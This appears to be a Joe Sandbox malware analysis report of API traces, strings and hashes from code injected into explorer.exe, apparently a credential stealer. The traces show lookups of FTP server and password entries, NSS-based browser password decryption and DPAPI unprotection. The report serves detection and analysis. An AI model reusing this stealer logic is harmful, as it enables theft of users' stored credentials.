                                                                                                                                                                                                                              • API ID: HeapTime$AllocateFileProcessSystem_alldivwsprintf
                                                                                                                                                                                                                              • String ID: %li
                                                                                                                                                                                                                              • API String ID: 4120667308-1021419598
                                                                                                                                                                                                                              • Opcode ID: ec3394f8f1021d376d8d2472f29bbb303491dc787c231e86ab7ab0423c689708
                                                                                                                                                                                                                              • Instruction ID: 460602f8d664ecea35cecb2992ae4d0c1efa82cfa93431a35d4cf649693d3cb3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ec3394f8f1021d376d8d2472f29bbb303491dc787c231e86ab7ab0423c689708
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FFE09232A40208B7D7223BA8AC0AEEE7B6DDB40B56F400591FA05F6345D9628E3487E5
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,02D63E4B,00000000), ref: 02D6124A
                                                                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 02D61268
                                                                                                                                                                                                                                • Part of subcall function 02D61000: GetProcessHeap.KERNEL32(00000008,?,02D611C7,?,?,00000001,00000000,?), ref: 02D61003
                                                                                                                                                                                                                                • Part of subcall function 02D61000: RtlAllocateHeap.NTDLL(00000000), ref: 02D6100A
                                                                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 02D61295
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: BinaryCryptHeapString$AllocateProcesslstrlen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 117552131-0
                                                                                                                                                                                                                              • Opcode ID: 5e3588ba5719e3c0bd1a9684b6a5765ba36135501ad16b85bee681023221838e
                                                                                                                                                                                                                              • Instruction ID: e95f29e449e7c9bcc2f27832256b77638cb854729cf605c652fcf9c4c27c64f6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e3588ba5719e3c0bd1a9684b6a5765ba36135501ad16b85bee681023221838e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1501A2B1604305AFE718CF16CC89FBBB7ACEB84695F004A2EF505C2340DBA1DC018AB0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,74DEF360,00000000,?,00000000,?,02D646E3), ref: 02D611ED
                                                                                                                                                                                                                              • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 02D6120F
                                                                                                                                                                                                                                • Part of subcall function 02D61000: GetProcessHeap.KERNEL32(00000008,?,02D611C7,?,?,00000001,00000000,?), ref: 02D61003
                                                                                                                                                                                                                                • Part of subcall function 02D61000: RtlAllocateHeap.NTDLL(00000000), ref: 02D6100A
                                                                                                                                                                                                                              • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 02D61231
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: BinaryCryptHeapString$AllocateProcesslstrlen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 117552131-0
                                                                                                                                                                                                                              • Opcode ID: ad874ff725c94c131783c73c816cdc685338f4bdd980b639d75a16f54c0e4077
                                                                                                                                                                                                                              • Instruction ID: ec11a00a2d334dc086be387d1322de43fd466f21eb7fc09d898827f028eb0256
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ad874ff725c94c131783c73c816cdc685338f4bdd980b639d75a16f54c0e4077
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 49F0967260430E7BE2109E56DC85FB77B9DDF85695F15042EB601C6340DE92ED0586B4
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 02D61FFA
                                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(?,?,?), ref: 02D62015
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CryptDataMemoryMoveUnprotect
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2807545630-0
                                                                                                                                                                                                                              • Opcode ID: aad30803aeb88ae42a4bfb2f587d4c20816bbfbd60c511302c16261252003607
                                                                                                                                                                                                                              • Instruction ID: d344ee086f2824d9ac96d55dcc33d1d56dd10e5df41b6ac0b9daf83f24b7ff71
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aad30803aeb88ae42a4bfb2f587d4c20816bbfbd60c511302c16261252003607
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F5012171A01219EB9B15DF9AD888DBFBBBCEF05351B20446AF905D3300D7719E10CBA0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CryptBinaryToStringA.CRYPT32(?,?,00000001,00000000,?), ref: 02D611B2
                                                                                                                                                                                                                                • Part of subcall function 02D61000: GetProcessHeap.KERNEL32(00000008,?,02D611C7,?,?,00000001,00000000,?), ref: 02D61003
                                                                                                                                                                                                                                • Part of subcall function 02D61000: RtlAllocateHeap.NTDLL(00000000), ref: 02D6100A
                                                                                                                                                                                                                              • CryptBinaryToStringA.CRYPT32(?,?,00000001,00000000,?,?,?,00000001,00000000,?), ref: 02D611D2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: BinaryCryptHeapString$AllocateProcess
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3825993179-0
                                                                                                                                                                                                                              • Opcode ID: cbd3b34726e232a0bcbae78c570417ad9e2c0fad560e0d201dbb2ce4431007e1
                                                                                                                                                                                                                              • Instruction ID: 6d3c20b5fa9e4e5cd7b57341b478e6f61f139766413d111621535579e80400c7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cbd3b34726e232a0bcbae78c570417ad9e2c0fad560e0d201dbb2ce4431007e1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E7F08232A00119B7D72089979C88DFBBB6DDF856A5B100169F90DD2340DA62DD04C6E0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CoCreateInstance.COMBASE(02DB62B0,00000000,00000001,02DB62A0,?), ref: 02D6445F
                                                                                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 02D644AA
                                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(RecentServers,?), ref: 02D6456E
                                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(Servers,?), ref: 02D6457D
                                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(Settings,?), ref: 02D6458C
                                                                                                                                                                                                                                • Part of subcall function 02D611E1: lstrlenW.KERNEL32(?,74DEF360,00000000,?,00000000,?,02D646E3), ref: 02D611ED
                                                                                                                                                                                                                                • Part of subcall function 02D611E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 02D6120F
                                                                                                                                                                                                                                • Part of subcall function 02D611E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 02D61231
                                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(Server,?), ref: 02D645BE
                                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(LastServer,?), ref: 02D645CD
                                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(Host,?), ref: 02D64657
                                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(Port,?), ref: 02D64679
                                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(User,?), ref: 02D6469F
                                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(Pass,?), ref: 02D646C5
                                                                                                                                                                                                                              • wsprintfW.USER32 ref: 02D6471E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcmpi$String$BinaryCrypt$AllocCreateInstancelstrlenwsprintf
                                                                                                                                                                                                                              • String ID: %s:%s$Host$LastServer$Pass$Port$RecentServers$Server$Servers$Settings$User
                                                                                                                                                                                                                              • API String ID: 2230072276-1234691226
                                                                                                                                                                                                                              • Opcode ID: 7840df11732eb8f347a6531cab32c9a12b103ab029c3c86c04caf29bf2d5316c
                                                                                                                                                                                                                              • Instruction ID: e5e601c1eef765d19ccb0a0a826d8f1d9956482a7539c559e8ca73750574b013
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7840df11732eb8f347a6531cab32c9a12b103ab029c3c86c04caf29bf2d5316c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8AB1E871204302AFD710DF64C898E6A77F9EF89759F00895CF5558B260DB71ED0ACBA2
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 02D61000: GetProcessHeap.KERNEL32(00000008,?,02D611C7,?,?,00000001,00000000,?), ref: 02D61003
                                                                                                                                                                                                                                • Part of subcall function 02D61000: RtlAllocateHeap.NTDLL(00000000), ref: 02D6100A
                                                                                                                                                                                                                                • Part of subcall function 02D61090: lstrlenW.KERNEL32(?,?,00000000,02D617E5), ref: 02D61097
                                                                                                                                                                                                                                • Part of subcall function 02D61090: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000), ref: 02D610A8
                                                                                                                                                                                                                                • Part of subcall function 02D619B4: lstrlenW.KERNEL32(00000000,00000000,00000000,02D62CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 02D619C4
                                                                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,00000000), ref: 02D62503
                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(00000000), ref: 02D6250A
                                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(00000000), ref: 02D62563
                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 02D62570
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 02D62591
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 02D6259E
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SECITEM_FreeItem), ref: 02D625AB
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 02D625B8
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 02D625C5
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 02D625D2
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 02D625DF
                                                                                                                                                                                                                                • Part of subcall function 02D6190B: lstrlen.KERNEL32(?,?,?,?,00000000,02D62783), ref: 02D6192B
                                                                                                                                                                                                                                • Part of subcall function 02D6190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,02D62783), ref: 02D61930
                                                                                                                                                                                                                                • Part of subcall function 02D6190B: lstrcat.KERNEL32(00000000,?), ref: 02D61946
                                                                                                                                                                                                                                • Part of subcall function 02D6190B: lstrcat.KERNEL32(00000000,00000000), ref: 02D6194A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressProc$lstrlen$CurrentDirectory$Heaplstrcat$AllocateByteCharLibraryLoadMultiProcessWide
                                                                                                                                                                                                                              • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$SECITEM_FreeItem$nss3.dll$sql:
                                                                                                                                                                                                                              • API String ID: 3366569387-3272982511
                                                                                                                                                                                                                              • Opcode ID: a348a94a7bfdeabf9841a097006defed81e20ba08e53b132b7601c40f017a75b
                                                                                                                                                                                                                              • Instruction ID: 54218966ae3fa33691f64ca0fcccf48f77ae971d7709a1dbd82f859281c09b34
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a348a94a7bfdeabf9841a097006defed81e20ba08e53b132b7601c40f017a75b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8741F332E40352CB9B15AFB5586C67E3BAADF85741B20452ED88A93381DB74CC05CFA1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 02D65BF5: memset.NTDLL ref: 02D65C07
                                                                                                                                                                                                                              • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 02D660E1
                                                                                                                                                                                                                              • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 02D660EC
                                                                                                                                                                                                                              • _alldiv.NTDLL(?,?,000003E8,00000000), ref: 02D66113
                                                                                                                                                                                                                              • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 02D6618E
                                                                                                                                                                                                                              • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 02D661B5
                                                                                                                                                                                                                              • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 02D661C1
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _alldiv$_allrem$memset
                                                                                                                                                                                                                              • String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld$W
                                                                                                                                                                                                                              • API String ID: 2557048445-1989508764
                                                                                                                                                                                                                              • Opcode ID: b7e9f290fea29d79714b90e7bb31a387f0793206404513dc47b362048e1b3c62
                                                                                                                                                                                                                              • Instruction ID: c3f613df66bb388c229ded8132ad869299b2e667719bf2d3df6e611b8b0370fb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b7e9f290fea29d79714b90e7bb31a387f0793206404513dc47b362048e1b3c62
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 03B17FB29083429FE7269E24DC8CB3A7BD9EB84348F540659F4C3A63C5EB25DD50CAD1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memcmp.NTDLL(02DB637A,BINARY,00000007), ref: 02D7D324
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcmp
                                                                                                                                                                                                                              • String ID: %.16g$%lld$%s(%d)$(%.20s)$(blob)$,%d$,%s%s$BINARY$NULL$k(%d$program$vtab:%p
                                                                                                                                                                                                                              • API String ID: 1475443563-3683840195
                                                                                                                                                                                                                              • Opcode ID: a4d755ad9d8962bea98e7588e6ebac1da54eeb043550d237833adfad46c05fc8
                                                                                                                                                                                                                              • Instruction ID: d477967a1cc5398a4cba768548fc33b7e2934640f8e9d7a912747fef915500aa
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a4d755ad9d8962bea98e7588e6ebac1da54eeb043550d237833adfad46c05fc8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3651BE31504304EBE7269F64D854ABAB7EBEF45604F080969F9D39B340E379EC09CBA1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 02D619E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02D61AE2,PortNumber,00000000,00000000), ref: 02D61A1E
                                                                                                                                                                                                                                • Part of subcall function 02D619E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02D61A3C
                                                                                                                                                                                                                                • Part of subcall function 02D619E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02D61A75
                                                                                                                                                                                                                                • Part of subcall function 02D619E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02D61AE2,PortNumber,00000000,00000000), ref: 02D61A98
                                                                                                                                                                                                                                • Part of subcall function 02D6482C: lstrlenW.KERNEL32(?), ref: 02D64845
                                                                                                                                                                                                                                • Part of subcall function 02D6482C: lstrlenW.KERNEL32(?), ref: 02D6488F
                                                                                                                                                                                                                                • Part of subcall function 02D6482C: lstrlenW.KERNEL32(?), ref: 02D64897
                                                                                                                                                                                                                              • wsprintfW.USER32 ref: 02D649A7
                                                                                                                                                                                                                              • wsprintfW.USER32 ref: 02D649B9
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrlen$QueryValuewsprintf$CloseOpen
                                                                                                                                                                                                                              • String ID: %s:%u$%s:%u/%s$HostName$Password$RemoteDirectory$UserName
                                                                                                                                                                                                                              • API String ID: 2889301010-4273187114
                                                                                                                                                                                                                              • Opcode ID: 7e7224b00b3c5c50af50f2cb0c3c4826729ef836062dca132854ba80c58c839a
                                                                                                                                                                                                                              • Instruction ID: 1ddfcd11530d6fda0cd4e3c7a755b0b6a3f35b40b90931d6a8b59aa9c0515748
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e7224b00b3c5c50af50f2cb0c3c4826729ef836062dca132854ba80c58c839a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1131C325B44304ABD721AB65C85CA3BB6EEFFC9688F05491EB04597380DBB2DD01CBE1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memcpy.NTDLL(?,?,?,?,00000000), ref: 02D6FB32
                                                                                                                                                                                                                              • memcpy.NTDLL(?,?,00000000,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 02D6FB4D
                                                                                                                                                                                                                              • memcpy.NTDLL(?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 02D6FB60
                                                                                                                                                                                                                              • memcpy.NTDLL(?,?,?,?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030), ref: 02D6FB95
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                              • String ID: -journal$-wal$immutable$nolock
                                                                                                                                                                                                                              • API String ID: 3510742995-3408036318
                                                                                                                                                                                                                              • Opcode ID: 21ce98e435554394c029aeb949552d843c61c808d6d40c5fda223c9889892bf1
                                                                                                                                                                                                                              • Instruction ID: 54df0d9d45de06693eb137e14c5a6af7d7a04475611f41607847cfc2d98dbc6f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 21ce98e435554394c029aeb949552d843c61c808d6d40c5fda223c9889892bf1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F6D1C1B16087418FDB14DF28D894B2ABBE6EF85314F08496DE89A8B391D775DC04CF62
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: %$-x0$NaN
                                                                                                                                                                                                                              • API String ID: 0-62881354
                                                                                                                                                                                                                              • Opcode ID: 214fb30ea590f14b1ef3fdfb16a80956d1a240a240694aab552d856456be1306
                                                                                                                                                                                                                              • Instruction ID: 40df8844949c7ad0f244b454806472d9c63672894bdc3bfaca4d1d8f5e161048
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 214fb30ea590f14b1ef3fdfb16a80956d1a240a240694aab552d856456be1306
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34D1E530A0C3868FE7258E28849877AFBE5EF8960CF18595EF8D187351D764CD45CB92
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: -x0$NaN
                                                                                                                                                                                                                              • API String ID: 0-3447725786
                                                                                                                                                                                                                              • Opcode ID: 1ee5180015ef30e22dd080857427ab623be1ee3aabd67d972d80abd53f44cce8
                                                                                                                                                                                                                              • Instruction ID: 77d8b4ef1e576b99bbe880218529b1791f5b1b77a2b5fc5ef2140a9e43ccde1f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1ee5180015ef30e22dd080857427ab623be1ee3aabd67d972d80abd53f44cce8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D7E10530A0C3868FE7258E28845877AFBE5EF8960CF18595EE8D287391D764CD45CB92
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: -x0$NaN
                                                                                                                                                                                                                              • API String ID: 0-3447725786
                                                                                                                                                                                                                              • Opcode ID: 6304b45cf29003389b9ed779c3fae96e3e5a824e923a7d82fbb22767b7278e5f
                                                                                                                                                                                                                              • Instruction ID: d62118d31ad26b23de147989868881a563be24bc564db2fbadc7f8c16418b14e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6304b45cf29003389b9ed779c3fae96e3e5a824e923a7d82fbb22767b7278e5f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EDE1E230A083868FE725CE28849877AFBE5EF8960CF18595EF8D187391D764CD45CB92
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: -x0$NaN
                                                                                                                                                                                                                              • API String ID: 0-3447725786
                                                                                                                                                                                                                              • Opcode ID: 2c3e6436d76f52d0219d881dc0867032b304c61c67fb68bb0fc5a72ccd297eec
                                                                                                                                                                                                                              • Instruction ID: 7ef8a3ab07dfb54dad2fdaa810fbfa0426b06f635b1c67d2bd60c742b87adef1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2c3e6436d76f52d0219d881dc0867032b304c61c67fb68bb0fc5a72ccd297eec
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 44E1E430A083868FE7258E28849877AFBE5EF8920CF18595EF8D187351D765CD45CB92
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: -x0$NaN
                                                                                                                                                                                                                              • API String ID: 0-3447725786
                                                                                                                                                                                                                              • Opcode ID: 089fa2599dfadab5237ae1600b2a457447cab0383046bdab823bbd24935cb25c
                                                                                                                                                                                                                              • Instruction ID: 8eaa7cbe692fe238faef5dd9b1f1897276f7c0025e86296edfff0d9971350662
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 089fa2599dfadab5237ae1600b2a457447cab0383046bdab823bbd24935cb25c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C7E1D370A0C3868FE7258E28849877AFBE5EF8920CF18595EF8D187391D764CD45CB92
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _aulldvrm.NTDLL(00000000,00000002,0000000A,00000000), ref: 02D6720E
                                                                                                                                                                                                                              • _aullrem.NTDLL(00000000,?,0000000A,00000000), ref: 02D67226
                                                                                                                                                                                                                              • _aulldvrm.NTDLL(00000000,00000000,?), ref: 02D6727B
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _aulldvrm$_aullrem
                                                                                                                                                                                                                              • String ID: -x0$NaN
                                                                                                                                                                                                                              • API String ID: 105165338-3447725786
                                                                                                                                                                                                                              • Opcode ID: a902b191c2abdb5d6f4e9c6fb1d22b477999668780b9e0ad532564c067b277d3
                                                                                                                                                                                                                              • Instruction ID: d97f3e8f63e5be5445535cddefa49802f0cb549529f2bcfdc4578fb11034bdbc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a902b191c2abdb5d6f4e9c6fb1d22b477999668780b9e0ad532564c067b277d3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 07D1D530A0C3868FE7258E28849877AFBE5EF8960CF18595DF8D187351D764CD45CB92
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _allmul.NTDLL(00000000,?,0000000A,00000000), ref: 02D68AAD
                                                                                                                                                                                                                              • _allmul.NTDLL(?,?,0000000A,00000000), ref: 02D68B66
                                                                                                                                                                                                                              • _allmul.NTDLL(?,00000000,0000000A,00000000), ref: 02D68C9B
                                                                                                                                                                                                                              • _alldvrm.NTDLL(?,00000000,0000000A,00000000), ref: 02D68CAE
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
